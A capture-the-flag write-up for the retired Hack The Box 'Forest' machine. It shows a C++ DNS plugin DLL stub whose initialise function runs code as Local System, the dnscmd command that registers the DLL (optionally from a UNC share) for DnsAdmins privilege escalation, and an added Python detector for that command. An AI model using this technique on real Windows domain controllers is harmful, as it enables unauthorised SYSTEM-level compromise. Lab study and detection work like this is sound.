Hack The Box – Forest (Video Walkthrough)

Recently uploaded my video guide to the HTB Forest machine that was retired this weekend:

To get a good understanding of everything in this one, I’d recommend watching the two videos below as well:

DNS Server Plugin DLL Example (DnsPluginInitialize etc)

There’s a great blog post from Shay Ber on this subject already, but when I tried to follow along myself I hit a few stumbling blocks with the C++ parts as I’ve got no experience with that language (and after using it, my god I realise how spoiled we are with languages like C#.NET).

Anyway, here’s what I ended up doing to make it all work for me:

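//DnsPlugin.h file
#pragma once
#include <windows.h> // for PVOID

// extern "C" exports the functions under their plain, unmangled names
#define DNSPLUGIN_API extern "C" __declspec(dllexport)

DNSPLUGIN_API int DnsPluginInitialize(PVOID, PVOID);
DNSPLUGIN_API int DnsPluginCleanup();
DNSPLUGIN_API int DnsPluginQuery(PVOID, PVOID, PVOID, PVOID);

//DnsPlugin.cpp file
#include "DnsPlugin.h"

void doStuff(); // placeholder used in this post; its body is not shown here

DNSPLUGIN_API int DnsPluginInitialize(PVOID a1, PVOID a2) {
	doStuff(); //Runs as LOCAL SYSTEM
	return 0;
}

DNSPLUGIN_API int DnsPluginCleanup() {
	return 0;
}

DNSPLUGIN_API int DnsPluginQuery(PVOID a1, PVOID a2, PVOID a3, PVOID a4) {
	return 0;
}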

A few notes:

I changed the target architecture to X64 instead of X86, as all versions of Windows Server since 2008 have been x64 only (plus I had some weird compiler errors when targeting Win32 that magically went away when I changed to X64).

In Shay’s original code example he mentions having to use a linker export option to get the correct function signature exported for the DLL, but I had a lot of issues with copying his method and ended up just using this instead as you can see in the code above:

#define DNSPLUGIN_API extern "C" __declspec(dllexport)

I also found that the DNS service would crash with a “module not found” error when trying to load my DLL at first, because it didn’t have the correct C++ runtime installed so it couldn’t find MSVCR100.dll. A simple solution to that was to change the project properties to “Multi threaded /MT” instead of the default “Multi threaded DLL /MD”. Again I’m very new to C++ but from what I gather this means that the dependency on MSVCR100 will be embedded in the DLL and not dynamically linked to at runtime, so now the target server doesn’t need to have the correct version of C++ runtime installed.

So yeah, once I had done all that I copied my DLL over to the target machine where I only had DnsAdmin rights and used this command:

DnsCmd /Config /ServerLevelPluginDll "C:\PathToDnsPlugin.dll"

Alternatively you can use a UNC path, so you could make a share on your PC and then have it point to that (if you can’t copy files to the target machine).

Now we restart the DNS service, and it worked! Any code I put in the “doStuff” function in my code above will be executed as Local System.
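From the defender's side, the DnsCmd invocation above is a narrow, stable thing to alert on. The following is an added example, not code from the original post: it scans process command lines for a change to ServerLevelPluginDll and marks UNC paths, which mean the DLL would be loaded from a remote share. The event field names, hosts, users and sample command lines are constructed for illustration.

```python
import re

# Matches: dnscmd[.exe] [<server>] /config /serverlevelplugindll <path>
# Case-insensitive; <path> is either double-quoted or a bare token.
_PLUGIN_RE = re.compile(
    r'\bdnscmd(?:\.exe)?"?\s+(?:[^\s/]\S*\s+)?/config\s+/serverlevelplugindll\s+'
    r'(?:"([^"]*)"|(\S+))',
    re.IGNORECASE,
)

# Constructed sample events (not real telemetry); field names are assumptions.
SAMPLE_EVENTS = [
    {"host": "DC01", "user": "CORP\\svc-dnsadmin",
     "cmdline": r'DnsCmd /Config /ServerLevelPluginDll "C:\PathToDnsPlugin.dll"'},
    {"host": "DC01", "user": "CORP\\svc-dnsadmin",
     "cmdline": r'C:\Windows\System32\dnscmd.exe dc01 /config '
                r'/serverlevelplugindll \\files.example\share\plugin.dll'},
    {"host": "DC02", "user": "CORP\\alice", "cmdline": r'dnscmd /enumzones'},
    {"host": "DC02", "user": "CORP\\alice",
     "cmdline": r'dnscmd /config /loglevel 0x8100'},
]


def find_plugin_changes(events):
    """Return one finding per event whose command line sets ServerLevelPluginDll."""
    findings = []
    for ev in events:
        m = _PLUGIN_RE.search(ev["cmdline"])
        if not m:
            continue  # unrelated dnscmd usage, or not dnscmd at all
        path = m.group(1) if m.group(1) is not None else m.group(2)
        findings.append({
            "host": ev["host"],
            "user": ev["user"],
            "dll_path": path,
            # A UNC path means the DNS service would load code from a remote share.
            "remote_load": path.startswith(("\\\\", "//")),
        })
    return findings


if __name__ == "__main__":
    for finding in find_plugin_changes(SAMPLE_EVENTS):
        tag = "REMOTE (UNC)" if finding["remote_load"] else "local"
        print(f'{finding["host"]} {finding["user"]} -> {finding["dll_path"]} [{tag}]')
```

In practice the events would come from process-creation logging on DNS servers and admin workstations, and any hit is worth reviewing because this setting rarely changes in normal operation.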